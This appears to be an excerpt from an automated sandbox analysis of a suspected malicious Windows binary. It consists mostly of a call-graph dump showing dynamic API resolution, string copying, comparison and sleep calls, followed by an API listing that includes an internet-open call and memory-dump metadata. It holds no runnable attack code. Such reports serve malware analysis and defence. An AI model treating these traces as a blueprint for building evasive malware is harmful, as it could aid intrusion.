26227->26228 26229 9d15df 26227->26229 26228->26229 26230 9d160f lstrcpy 26229->26230 26232 9d1617 26229->26232 26230->26232 26231 9d0155 lstrlen 26231->25994 26232->26231 26233 9d1647 lstrcpy 26232->26233 26233->26231 26235 9b4a60 2 API calls 26234->26235 26236 9b2e82 26235->26236 26237 9b4a60 2 API calls 26236->26237 26238 9b2ea0 26237->26238 26239 9b4a60 2 API calls 26238->26239 26240 9b2eb6 26239->26240 26241 9b4a60 2 API calls 26240->26241 26242 9b2ecb 26241->26242 
26243 9b4a60 2 API calls 26242->26243 26244 9b2eec 26243->26244 26245 9b4a60 2 API calls 26244->26245 26246 9b2f01 26245->26246 26247 9b4a60 2 API calls 26246->26247 26248 9b2f19 26247->26248 26249 9b4a60 2 API calls 26248->26249 26250 9b2f3a 26249->26250 26251 9b4a60 2 API calls 26250->26251 26252 9b2f4f 26251->26252 26253 9b4a60 2 API calls 26252->26253 26254 9b2f65 26253->26254 26255 9b4a60 2 API calls 26254->26255 26256 9b2f7b 26255->26256 26257 9b4a60 2 API calls 26256->26257 26258 9b2f91 26257->26258 26259 9b4a60 2 API calls 26258->26259 26260 9b2faa 26259->26260 26261 9b4a60 2 API calls 26260->26261 26262 9b2fc0 26261->26262 26263 9b4a60 2 API calls 26262->26263 26264 9b2fd6 26263->26264 26265 9b4a60 2 API calls 26264->26265 26266 9b2fec 26265->26266 26267 9b4a60 2 API calls 26266->26267 26268 9b3002 26267->26268 26269 9b4a60 2 API calls 26268->26269 26270 9b3018 26269->26270 26271 9b4a60 2 API calls 26270->26271 26272 9b3031 26271->26272 26273 9b4a60 2 API calls 26272->26273 26274 9b3047 26273->26274 26275 9b4a60 2 API calls 26274->26275 26276 9b305d 26275->26276 26277 9b4a60 2 API calls 26276->26277 26278 9b3073 26277->26278 26279 9b4a60 2 API calls 26278->26279 26280 9b3089 26279->26280 26281 9b4a60 2 API calls 26280->26281 26282 9b309f 26281->26282 26283 9b4a60 2 API calls 26282->26283 26284 9b30b8 26283->26284 26285 9b4a60 2 API calls 26284->26285 26286 9b30ce 26285->26286 26287 9b4a60 2 API calls 26286->26287 26288 9b30e4 26287->26288 26289 9b4a60 2 API calls 26288->26289 26290 9b30fa 26289->26290 26291 9b4a60 2 API calls 26290->26291 26292 9b3110 26291->26292 26293 9b4a60 2 API calls 26292->26293 26294 9b3126 26293->26294 26295 9b4a60 2 API calls 26294->26295 26296 9b313f 26295->26296 26297 9b4a60 2 API calls 26296->26297 26298 9b3155 26297->26298 26299 9b4a60 2 API calls 26298->26299 26300 9b316b 26299->26300 26301 9b4a60 2 API calls 26300->26301 26302 9b3181 26301->26302 26303 9b4a60 2 API calls 26302->26303 26304 9b3197 26303->26304 26305 9b4a60 2 
API calls 26304->26305 26306 9b31ad 26305->26306 26307 9b4a60 2 API calls 26306->26307 26308 9b31c6 26307->26308 26309 9b4a60 2 API calls 26308->26309 26310 9b31dc 26309->26310 26311 9b4a60 2 API calls 26310->26311 26312 9b31f2 26311->26312 26313 9b4a60 2 API calls 26312->26313 26314 9b3208 26313->26314 26315 9b4a60 2 API calls 26314->26315 26316 9b321e 26315->26316 26317 9b4a60 2 API calls 26316->26317 26318 9b3234 26317->26318 26319 9b4a60 2 API calls 26318->26319 26320 9b324d 26319->26320 26321 9b4a60 2 API calls 26320->26321 26322 9b3263 26321->26322 26323 9b4a60 2 API calls 26322->26323 26324 9b3279 26323->26324 26325 9b4a60 2 API calls 26324->26325 26326 9b328f 26325->26326 26327 9b4a60 2 API calls 26326->26327 26328 9b32a5 26327->26328 26329 9b4a60 2 API calls 26328->26329 26330 9b32bb 26329->26330 26331 9b4a60 2 API calls 26330->26331 26332 9b32d4 26331->26332 26333 9b4a60 2 API calls 26332->26333 26334 9b32ea 26333->26334 26335 9b4a60 2 API calls 26334->26335 26336 9b3300 26335->26336 26337 9b4a60 2 API calls 26336->26337 26338 9b3316 26337->26338 26339 9b4a60 2 API calls 26338->26339 26340 9b332c 26339->26340 26341 9b4a60 2 API calls 26340->26341 26342 9b3342 26341->26342 26343 9b4a60 2 API calls 26342->26343 26344 9b335b 26343->26344 26345 9b4a60 2 API calls 26344->26345 26346 9b3371 26345->26346 26347 9b4a60 2 API calls 26346->26347 26348 9b3387 26347->26348 26349 9b4a60 2 API calls 26348->26349 26350 9b339d 26349->26350 26351 9b4a60 2 API calls 26350->26351 26352 9b33b3 26351->26352 26353 9b4a60 2 API calls 26352->26353 26354 9b33c9 26353->26354 26355 9b4a60 2 API calls 26354->26355 26356 9b33e2 26355->26356 26357 9b4a60 2 API calls 26356->26357 26358 9b33f8 26357->26358 26359 9b4a60 2 API calls 26358->26359 26360 9b340e 26359->26360 26361 9b4a60 2 API calls 26360->26361 26362 9b3424 26361->26362 26363 9b4a60 2 API calls 26362->26363 26364 9b343a 26363->26364 26365 9b4a60 2 API calls 26364->26365 26366 9b3450 26365->26366 26367 9b4a60 2 API calls 
26366->26367 26368 9b3469 26367->26368 26369 9b4a60 2 API calls 26368->26369 26370 9b347f 26369->26370 26371 9b4a60 2 API calls 26370->26371 26372 9b3495 26371->26372 26373 9b4a60 2 API calls 26372->26373 26374 9b34ab 26373->26374 26375 9b4a60 2 API calls 26374->26375 26376 9b34c1 26375->26376 26377 9b4a60 2 API calls 26376->26377 26378 9b34d7 26377->26378 26379 9b4a60 2 API calls 26378->26379 26380 9b34f0 26379->26380 26381 9b4a60 2 API calls 26380->26381 26382 9b3506 26381->26382 26383 9b4a60 2 API calls 26382->26383 26384 9b351c 26383->26384 26385 9b4a60 2 API calls 26384->26385 26386 9b3532 26385->26386 26387 9b4a60 2 API calls 26386->26387 26388 9b3548 26387->26388 26389 9b4a60 2 API calls 26388->26389 26390 9b355e 26389->26390 26391 9b4a60 2 API calls 26390->26391 26392 9b3577 26391->26392 26393 9b4a60 2 API calls 26392->26393 26394 9b358d 26393->26394 26395 9b4a60 2 API calls 26394->26395 26396 9b35a3 26395->26396 26397 9b4a60 2 API calls 26396->26397 26398 9b35b9 26397->26398 26399 9b4a60 2 API calls 26398->26399 26400 9b35cf 26399->26400 26401 9b4a60 2 API calls 26400->26401 26402 9b35e5 26401->26402 26403 9b4a60 2 API calls 26402->26403 26404 9b35fe 26403->26404 26405 9b4a60 2 API calls 26404->26405 26406 9b3614 26405->26406 26407 9b4a60 2 API calls 26406->26407 26408 9b362a 26407->26408 26409 9b4a60 2 API calls 26408->26409 26410 9b3640 26409->26410 26411 9b4a60 2 API calls 26410->26411 26412 9b3656 26411->26412 26413 9b4a60 2 API calls 26412->26413 26414 9b366c 26413->26414 26415 9b4a60 2 API calls 26414->26415 26416 9b3685 26415->26416 26417 9b4a60 2 API calls 26416->26417 26418 9b369b 26417->26418 26419 9b4a60 2 API calls 26418->26419 26420 9b36b1 26419->26420 26421 9b4a60 2 API calls 26420->26421 26422 9b36c7 26421->26422 26423 9b4a60 2 API calls 26422->26423 26424 9b36dd 26423->26424 26425 9b4a60 2 API calls 26424->26425 26426 9b36f3 26425->26426 26427 9b4a60 2 API calls 26426->26427 26428 9b370c 26427->26428 26429 9b4a60 2 API calls 26428->26429 
26430 9b3722 26429->26430 26431 9b4a60 2 API calls 26430->26431 26432 9b3738 26431->26432 26433 9b4a60 2 API calls 26432->26433 26434 9b374e 26433->26434 26435 9b4a60 2 API calls 26434->26435 26436 9b3764 26435->26436 26437 9b4a60 2 API calls 26436->26437 26438 9b377a 26437->26438 26439 9b4a60 2 API calls 26438->26439 26440 9b3793 26439->26440 26441 9b4a60 2 API calls 26440->26441 26442 9b37a9 26441->26442 26443 9b4a60 2 API calls 26442->26443 26444 9b37bf 26443->26444 26445 9b4a60 2 API calls 26444->26445 26446 9b37d5 26445->26446 26447 9b4a60 2 API calls 26446->26447 26448 9b37eb 26447->26448 26449 9b4a60 2 API calls 26448->26449 26450 9b3801 26449->26450 26451 9b4a60 2 API calls 26450->26451 26452 9b381a 26451->26452 26453 9b4a60 2 API calls 26452->26453 26454 9b3830 26453->26454 26455 9b4a60 2 API calls 26454->26455 26456 9b3846 26455->26456 26457 9b4a60 2 API calls 26456->26457 26458 9b385c 26457->26458 26459 9b4a60 2 API calls 26458->26459 26460 9b3872 26459->26460 26461 9b4a60 2 API calls 26460->26461 26462 9b3888 26461->26462 26463 9b4a60 2 API calls 26462->26463 26464 9b38a1 26463->26464 26465 9b4a60 2 API calls 26464->26465 26466 9b38b7 26465->26466 26467 9b4a60 2 API calls 26466->26467 26468 9b38cd 26467->26468 26469 9b4a60 2 API calls 26468->26469 26470 9b38e3 26469->26470 26471 9b4a60 2 API calls 26470->26471 26472 9b38f9 26471->26472 26473 9b4a60 2 API calls 26472->26473 26474 9b390f 26473->26474 26475 9b4a60 2 API calls 26474->26475 26476 9b3928 26475->26476 26477 9b4a60 2 API calls 26476->26477 26478 9b393e 26477->26478 26479 9b4a60 2 API calls 26478->26479 26480 9b3954 26479->26480 26481 9b4a60 2 API calls 26480->26481 26482 9b396a 26481->26482 26483 9b4a60 2 API calls 26482->26483 26484 9b3980 26483->26484 26485 9b4a60 2 API calls 26484->26485 26486 9b3996 26485->26486 26487 9b4a60 2 API calls 26486->26487 26488 9b39af 26487->26488 26489 9b4a60 2 API calls 26488->26489 26490 9b39c5 26489->26490 26491 9b4a60 2 API calls 26490->26491 26492 9b39db 
26491->26492 26493 9b4a60 2 API calls 26492->26493 26494 9b39f1 26493->26494 26495 9b4a60 2 API calls 26494->26495 26496 9b3a07 26495->26496 26497 9b4a60 2 API calls 26496->26497 26498 9b3a1d 26497->26498 26499 9b4a60 2 API calls 26498->26499 26500 9b3a36 26499->26500 26501 9b4a60 2 API calls 26500->26501 26502 9b3a4c 26501->26502 26503 9b4a60 2 API calls 26502->26503 26504 9b3a62 26503->26504 26505 9b4a60 2 API calls 26504->26505 26506 9b3a78 26505->26506 26507 9b4a60 2 API calls 26506->26507 26508 9b3a8e 26507->26508 26509 9b4a60 2 API calls 26508->26509 26510 9b3aa4 26509->26510 26511 9b4a60 2 API calls 26510->26511 26512 9b3abd 26511->26512 26513 9b4a60 2 API calls 26512->26513 26514 9b3ad3 26513->26514 26515 9b4a60 2 API calls 26514->26515 26516 9b3ae9 26515->26516 26517 9b4a60 2 API calls 26516->26517 26518 9b3aff 26517->26518 26519 9b4a60 2 API calls 26518->26519 26520 9b3b15 26519->26520 26521 9b4a60 2 API calls 26520->26521 26522 9b3b2b 26521->26522 26523 9b4a60 2 API calls 26522->26523 26524 9b3b44 26523->26524 26525 9b4a60 2 API calls 26524->26525 26526 9b3b5a 26525->26526 26527 9b4a60 2 API calls 26526->26527 26528 9b3b70 26527->26528 26529 9b4a60 2 API calls 26528->26529 26530 9b3b86 26529->26530 26531 9b4a60 2 API calls 26530->26531 26532 9b3b9c 26531->26532 26533 9b4a60 2 API calls 26532->26533 26534 9b3bb2 26533->26534 26535 9b4a60 2 API calls 26534->26535 26536 9b3bcb 26535->26536 26537 9b4a60 2 API calls 26536->26537 26538 9b3be1 26537->26538 26539 9b4a60 2 API calls 26538->26539 26540 9b3bf7 26539->26540 26541 9b4a60 2 API calls 26540->26541 26542 9b3c0d 26541->26542 26543 9b4a60 2 API calls 26542->26543 26544 9b3c23 26543->26544 26545 9b4a60 2 API calls 26544->26545 26546 9b3c39 26545->26546 26547 9b4a60 2 API calls 26546->26547 26548 9b3c52 26547->26548 26549 9b4a60 2 API calls 26548->26549 26550 9b3c68 26549->26550 26551 9b4a60 2 API calls 26550->26551 26552 9b3c7e 26551->26552 26553 9b4a60 2 API calls 26552->26553 26554 9b3c94 26553->26554 
26555 9b4a60 2 API calls 26554->26555 26556 9b3caa 26555->26556 26557 9b4a60 2 API calls 26556->26557 26558 9b3cc0 26557->26558 26559 9b4a60 2 API calls 26558->26559 26560 9b3cd9 26559->26560 26561 9b4a60 2 API calls 26560->26561 26562 9b3cef 26561->26562 26563 9b4a60 2 API calls 26562->26563 26564 9b3d05 26563->26564 26565 9b4a60 2 API calls 26564->26565 26566 9b3d1b 26565->26566 26567 9b4a60 2 API calls 26566->26567 26568 9b3d31 26567->26568 26569 9b4a60 2 API calls 26568->26569 26570 9b3d47 26569->26570 26571 9b4a60 2 API calls 26570->26571 26572 9b3d60 26571->26572 26573 9b4a60 2 API calls 26572->26573 26574 9b3d76 26573->26574 26575 9b4a60 2 API calls 26574->26575 26576 9b3d8c 26575->26576 26577 9b4a60 2 API calls 26576->26577 26578 9b3da2 26577->26578 26579 9b4a60 2 API calls 26578->26579 26580 9b3db8 26579->26580 26581 9b4a60 2 API calls 26580->26581 26582 9b3dce 26581->26582 26583 9b4a60 2 API calls 26582->26583 26584 9b3de7 26583->26584 26585 9b4a60 2 API calls 26584->26585 26586 9b3dfd 26585->26586 26587 9b4a60 2 API calls 26586->26587 26588 9b3e13 26587->26588 26589 9b4a60 2 API calls 26588->26589 26590 9b3e29 26589->26590 26591 9b4a60 2 API calls 26590->26591 26592 9b3e3f 26591->26592 26593 9b4a60 2 API calls 26592->26593 26594 9b3e55 26593->26594 26595 9b4a60 2 API calls 26594->26595 26596 9b3e6e 26595->26596 26597 9b4a60 2 API calls 26596->26597 26598 9b3e84 26597->26598 26599 9b4a60 2 API calls 26598->26599 26600 9b3e9a 26599->26600 26601 9b4a60 2 API calls 26600->26601 26602 9b3eb0 26601->26602 26603 9b4a60 2 API calls 26602->26603 26604 9b3ec6 26603->26604 26605 9b4a60 2 API calls 26604->26605 26606 9b3edc 26605->26606 26607 9b4a60 2 API calls 26606->26607 26608 9b3ef5 26607->26608 26609 9b4a60 2 API calls 26608->26609 26610 9b3f0b 26609->26610 26611 9b4a60 2 API calls 26610->26611 26612 9b3f21 26611->26612 26613 9b4a60 2 API calls 26612->26613 26614 9b3f37 26613->26614 26615 9b4a60 2 API calls 26614->26615 26616 9b3f4d 26615->26616 26617 9b4a60 2 
API calls 26616->26617 26618 9b3f63 26617->26618 26619 9b4a60 2 API calls 26618->26619 26620 9b3f7c 26619->26620 26621 9b4a60 2 API calls 26620->26621 26622 9b3f92 26621->26622 26623 9b4a60 2 API calls 26622->26623 26624 9b3fa8 26623->26624 26625 9b4a60 2 API calls 26624->26625 26626 9b3fbe 26625->26626 26627 9b4a60 2 API calls 26626->26627 26628 9b3fd4 26627->26628 26629 9b4a60 2 API calls 26628->26629 26630 9b3fea 26629->26630 26631 9b4a60 2 API calls 26630->26631 26632 9b4003 26631->26632 26633 9b4a60 2 API calls 26632->26633 26634 9b4019 26633->26634 26635 9b4a60 2 API calls 26634->26635 26636 9b402f 26635->26636 26637 9b4a60 2 API calls 26636->26637 26638 9b4045 26637->26638 26639 9b4a60 2 API calls 26638->26639 26640 9b405b 26639->26640 26641 9b4a60 2 API calls 26640->26641 26642 9b4071 26641->26642 26643 9b4a60 2 API calls 26642->26643 26644 9b408a 26643->26644 26645 9b4a60 2 API calls 26644->26645 26646 9b40a0 26645->26646 26647 9b4a60 2 API calls 26646->26647 26648 9b40b6 26647->26648 26649 9b4a60 2 API calls 26648->26649 26650 9b40cc 26649->26650 26651 9b4a60 2 API calls 26650->26651 26652 9b40e2 26651->26652 26653 9b4a60 2 API calls 26652->26653 26654 9b40f8 26653->26654 26655 9b4a60 2 API calls 26654->26655 26656 9b4111 26655->26656 26657 9b4a60 2 API calls 26656->26657 26658 9b4127 26657->26658 26659 9b4a60 2 API calls 26658->26659 26660 9b413d 26659->26660 26661 9b4a60 2 API calls 26660->26661 26662 9b4153 26661->26662 26663 9b4a60 2 API calls 26662->26663 26664 9b4169 26663->26664 26665 9b4a60 2 API calls 26664->26665 26666 9b417f 26665->26666 26667 9b4a60 2 API calls 26666->26667 26668 9b4198 26667->26668 26669 9b4a60 2 API calls 26668->26669 26670 9b41ae 26669->26670 26671 9b4a60 2 API calls 26670->26671 26672 9b41c4 26671->26672 26673 9b4a60 2 API calls 26672->26673 26674 9b41da 26673->26674 26675 9b4a60 2 API calls 26674->26675 26676 9b41f0 26675->26676 26677 9b4a60 2 API calls 26676->26677 26678 9b4206 26677->26678 26679 9b4a60 2 API calls 
26678->26679 26680 9b421f 26679->26680 26681 9b4a60 2 API calls 26680->26681 26682 9b4235 26681->26682 26683 9b4a60 2 API calls 26682->26683 26684 9b424b 26683->26684 26685 9b4a60 2 API calls 26684->26685 26686 9b4261 26685->26686 26687 9b4a60 2 API calls 26686->26687 26688 9b4277 26687->26688 26689 9b4a60 2 API calls 26688->26689 26690 9b428d 26689->26690 26691 9b4a60 2 API calls 26690->26691 26692 9b42a6 26691->26692 26693 9b4a60 2 API calls 26692->26693 26694 9b42bc 26693->26694 26695 9b4a60 2 API calls 26694->26695 26696 9b42d2 26695->26696 26697 9b4a60 2 API calls 26696->26697 26698 9b42e8 26697->26698 26699 9b4a60 2 API calls 26698->26699 26700 9b42fe 26699->26700 26701 9b4a60 2 API calls 26700->26701 26702 9b4314 26701->26702 26703 9b4a60 2 API calls 26702->26703 26704 9b432d 26703->26704 26705 9b4a60 2 API calls 26704->26705 26706 9b4343 26705->26706 26707 9b4a60 2 API calls 26706->26707 26708 9b4359 26707->26708 26709 9b4a60 2 API calls 26708->26709 26710 9b436f 26709->26710 26711 9b4a60 2 API calls 26710->26711 26712 9b4385 26711->26712 26713 9b4a60 2 API calls 26712->26713 26714 9b439b 26713->26714 26715 9b4a60 2 API calls 26714->26715 26716 9b43b4 26715->26716 26717 9b4a60 2 API calls 26716->26717 26718 9b43ca 26717->26718 26719 9b4a60 2 API calls 26718->26719 26720 9b43e0 26719->26720 26721 9b4a60 2 API calls 26720->26721 26722 9b43f6 26721->26722 26723 9b4a60 2 API calls 26722->26723 26724 9b440c 26723->26724 26725 9b4a60 2 API calls 26724->26725 26726 9b4422 26725->26726 26727 9b4a60 2 API calls 26726->26727 26728 9b443b 26727->26728 26729 9b4a60 2 API calls 26728->26729 26730 9b4451 26729->26730 26731 9b4a60 2 API calls 26730->26731 26732 9b4467 26731->26732 26733 9b4a60 2 API calls 26732->26733 26734 9b447d 26733->26734 26735 9b4a60 2 API calls 26734->26735 26736 9b4493 26735->26736 26737 9b4a60 2 API calls 26736->26737 26738 9b44a9 26737->26738 26739 9b4a60 2 API calls 26738->26739 26740 9b44c2 26739->26740 26741 9b4a60 2 API calls 26740->26741 
26742 9b44d8 26741->26742 26743 9b4a60 2 API calls 26742->26743 26744 9b44ee 26743->26744 26745 9b4a60 2 API calls 26744->26745 26746 9b4504 26745->26746 26747 9b4a60 2 API calls 26746->26747 26748 9b451a 26747->26748 26749 9b4a60 2 API calls 26748->26749 26750 9b4530 26749->26750 26751 9b4a60 2 API calls 26750->26751 26752 9b4549 26751->26752 26753 9b4a60 2 API calls 26752->26753 26754 9b455f 26753->26754 26755 9b4a60 2 API calls 26754->26755 26756 9b4575 26755->26756 26757 9b4a60 2 API calls 26756->26757 26758 9b458b 26757->26758 26759 9b4a60 2 API calls 26758->26759 26760 9b45a1 26759->26760 26761 9b4a60 2 API calls 26760->26761 26762 9b45b7 26761->26762 26763 9b4a60 2 API calls 26762->26763 26764 9b45d0 26763->26764 26765 9b4a60 2 API calls 26764->26765 26766 9b45e6 26765->26766 26767 9b4a60 2 API calls 26766->26767 26768 9b45fc 26767->26768 26769 9b4a60 2 API calls 26768->26769 26770 9b4612 26769->26770 26771 9b4a60 2 API calls 26770->26771 26772 9b4628 26771->26772 26773 9b4a60 2 API calls 26772->26773 26774 9b463e 26773->26774 26775 9b4a60 2 API calls 26774->26775 26776 9b4657 26775->26776 26777 9b4a60 2 API calls 26776->26777 26778 9b466d 26777->26778 26779 9b4a60 2 API calls 26778->26779 26780 9b4683 26779->26780 26781 9b4a60 2 API calls 26780->26781 26782 9b4699 26781->26782 26783 9b4a60 2 API calls 26782->26783 26784 9b46af 26783->26784 26785 9b4a60 2 API calls 26784->26785 26786 9b46c5 26785->26786 26787 9b4a60 2 API calls 26786->26787 26788 9b46de 26787->26788 26789 9b4a60 2 API calls 26788->26789 26790 9b46f4 26789->26790 26791 9b4a60 2 API calls 26790->26791 26792 9b470a 26791->26792 26793 9b4a60 2 API calls 26792->26793 26794 9b4720 26793->26794 26795 9b4a60 2 API calls 26794->26795 26796 9b4736 26795->26796 26797 9b4a60 2 API calls 26796->26797 26798 9b474c 26797->26798 26799 9b4a60 2 API calls 26798->26799 26800 9b4765 26799->26800 26801 9b4a60 2 API calls 26800->26801 26802 9b477b 26801->26802 26803 9b4a60 2 API calls 26802->26803 26804 9b4791 
26803->26804 26805 9b4a60 2 API calls 26804->26805 26806 9b47a7 26805->26806 26807 9b4a60 2 API calls 26806->26807 26808 9b47bd 26807->26808 26809 9b4a60 2 API calls 26808->26809 26810 9b47d3 26809->26810 26811 9b4a60 2 API calls 26810->26811 26812 9b47ec 26811->26812 26813 9b4a60 2 API calls 26812->26813 26814 9b4802 26813->26814 26815 9b4a60 2 API calls 26814->26815 26816 9b4818 26815->26816 26817 9b4a60 2 API calls 26816->26817 26818 9b482e 26817->26818 26819 9b4a60 2 API calls 26818->26819 26820 9b4844 26819->26820 26821 9b4a60 2 API calls 26820->26821 26822 9b485a 26821->26822 26823 9b4a60 2 API calls 26822->26823 26824 9b4873 26823->26824 26825 9b4a60 2 API calls 26824->26825 26826 9b4889 26825->26826 26827 9b4a60 2 API calls 26826->26827 26828 9b489f 26827->26828 26829 9b4a60 2 API calls 26828->26829 26830 9b48b5 26829->26830 26831 9b4a60 2 API calls 26830->26831 26832 9b48cb 26831->26832 26833 9b4a60 2 API calls 26832->26833 26834 9b48e1 26833->26834 26835 9b4a60 2 API calls 26834->26835 26836 9b48fa 26835->26836 26837 9b4a60 2 API calls 26836->26837 26838 9b4910 26837->26838 26839 9b4a60 2 API calls 26838->26839 26840 9b4926 26839->26840 26841 9b4a60 2 API calls 26840->26841 26842 9b493c 26841->26842 26843 9b4a60 2 API calls 26842->26843 26844 9b4952 26843->26844 26845 9b4a60 2 API calls 26844->26845 26846 9b4968 26845->26846 26847 9b4a60 2 API calls 26846->26847 26848 9b4981 26847->26848 26849 9b4a60 2 API calls 26848->26849 26850 9b4997 26849->26850 26851 9b4a60 2 API calls 26850->26851 26852 9b49ad 26851->26852 26853 9b4a60 2 API calls 26852->26853 26854 9b49c3 26853->26854 26855 9b4a60 2 API calls 26854->26855 26856 9b49d9 26855->26856 26857 9b4a60 2 API calls 26856->26857 26858 9b49ef 26857->26858 26859 9b4a60 2 API calls 26858->26859 26860 9b4a08 26859->26860 26861 9b4a60 2 API calls 26860->26861 26862 9b4a1e 26861->26862 26863 9b4a60 2 API calls 26862->26863 26864 9b4a34 26863->26864 26865 9b4a60 2 API calls 26864->26865 26866 9b4a4a 26865->26866 
26867 9d66e0 26866->26867 26868 9d66ed 43 API calls 26867->26868 26869 9d6afe 8 API calls 26867->26869 26868->26869 26870 9d6c08 26869->26870 26871 9d6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26869->26871 26872 9d6c15 8 API calls 26870->26872 26873 9d6cd2 26870->26873 26871->26870 26872->26873 26874 9d6d4f 26873->26874 26875 9d6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26873->26875 26876 9d6d5c 6 API calls 26874->26876 26877 9d6de9 26874->26877 26875->26874 26876->26877 26878 9d6df6 12 API calls 26877->26878 26879 9d6f10 26877->26879 26878->26879 26880 9d6f8d 26879->26880 26881 9d6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26879->26881 26882 9d6f96 GetProcAddress GetProcAddress 26880->26882 26883 9d6fc1 26880->26883 26881->26880 26882->26883 26884 9d6fca GetProcAddress GetProcAddress 26883->26884 26885 9d6ff5 26883->26885 26884->26885 26886 9d70ed 26885->26886 26887 9d7002 10 API calls 26885->26887 26888 9d70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26886->26888 26889 9d7152 26886->26889 26887->26886 26888->26889 26890 9d716e 26889->26890 26891 9d715b GetProcAddress 26889->26891 26892 9d7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26890->26892 26893 9d051f 26890->26893 26891->26890 26892->26893 26894 9b1530 26893->26894 27203 9b1610 26894->27203 26896 9b153b 26897 9b1555 lstrcpy 26896->26897 26898 9b155d 26896->26898 26897->26898 26899 9b1577 lstrcpy 26898->26899 26900 9b157f 26898->26900 26899->26900 26901 9b1599 lstrcpy 26900->26901 26902 9b15a1 26900->26902 26901->26902 26903 9b1605 26902->26903 26904 9b15fd lstrcpy 26902->26904 26905 9cf1b0 lstrlen 26903->26905 26904->26903 26906 9cf1e4 26905->26906 26907 9cf1eb lstrcpy 26906->26907 26908 9cf1f7 lstrlen 26906->26908 26907->26908 26909 9cf208 26908->26909 26910 9cf20f lstrcpy 26909->26910 26911 9cf21b lstrlen 26909->26911 26910->26911 26912 9cf22c 26911->26912 
26913 9cf233 lstrcpy 26912->26913 26914 9cf23f 26912->26914 26913->26914 26915 9cf258 lstrcpy 26914->26915 26916 9cf264 26914->26916 26915->26916 26917 9cf286 lstrcpy 26916->26917 26918 9cf292 26916->26918 26917->26918 26919 9cf2ba lstrcpy 26918->26919 26920 9cf2c6 26918->26920 26919->26920 26921 9cf2ea lstrcpy 26920->26921 26973 9cf300 26920->26973 26921->26973 26922 9cf30c lstrlen 26922->26973 26923 9cf4b9 lstrcpy 26923->26973 26924 9cf3a1 lstrcpy 26924->26973 26925 9cf4e8 lstrcpy 26986 9cf4f0 26925->26986 26926 9cf3c5 lstrcpy 26926->26973 26927 9b1530 8 API calls 26927->26986 26928 9cee90 28 API calls 26928->26973 26929 9cefb0 35 API calls 26929->26986 26930 9cf479 lstrcpy 26930->26973 26931 9cf59c lstrcpy 26931->26986 26932 9cf70f StrCmpCA 26937 9cfe8e 26932->26937 26932->26973 26933 9cf616 StrCmpCA 26933->26932 26933->26986 26934 9cfa29 StrCmpCA 26943 9cfe2b 26934->26943 26934->26973 26935 9cf73e lstrlen 26935->26973 26936 9cfead lstrlen 26949 9cfec7 26936->26949 26937->26936 26939 9cfea5 lstrcpy 26937->26939 26938 9cfd4d StrCmpCA 26941 9cfd60 Sleep 26938->26941 26951 9cfd75 26938->26951 26939->26936 26940 9cfa58 lstrlen 26940->26973 26941->26973 26942 9cf64a lstrcpy 26942->26986 26944 9cfe4a lstrlen 26943->26944 26946 9cfe42 lstrcpy 26943->26946 26957 9cfe64 26944->26957 26945 9cf89e lstrcpy 26945->26973 26946->26944 26947 9cee90 28 API calls 26947->26986 26948 9cf76f lstrcpy 26948->26973 26950 9cfee7 lstrlen 26949->26950 26955 9cfedf lstrcpy 26949->26955 26965 9cff01 26950->26965 26952 9cfd94 lstrlen 26951->26952 26953 9cfd8c lstrcpy 26951->26953 26959 9cfdae 26952->26959 26953->26952 26954 9cfbb8 lstrcpy 26954->26973 26955->26950 26956 9cfa89 lstrcpy 26956->26973 26958 9cfdce lstrlen 26957->26958 26960 9cfe7c lstrcpy 26957->26960 26974 9cfde8 26958->26974 26959->26958 26969 9cfdc6 lstrcpy 26959->26969 26960->26958 26961 9cf791 lstrcpy 26961->26973 26963 9b1530 8 API calls 26963->26973 26964 9cf8cd lstrcpy 26964->26986 26966 9cff21 26965->26966 26971 9cff19 
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 009B4C7F
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4CD2
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4D05
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4D35
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4D73
                                • lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009B4DA6
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009B4DB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
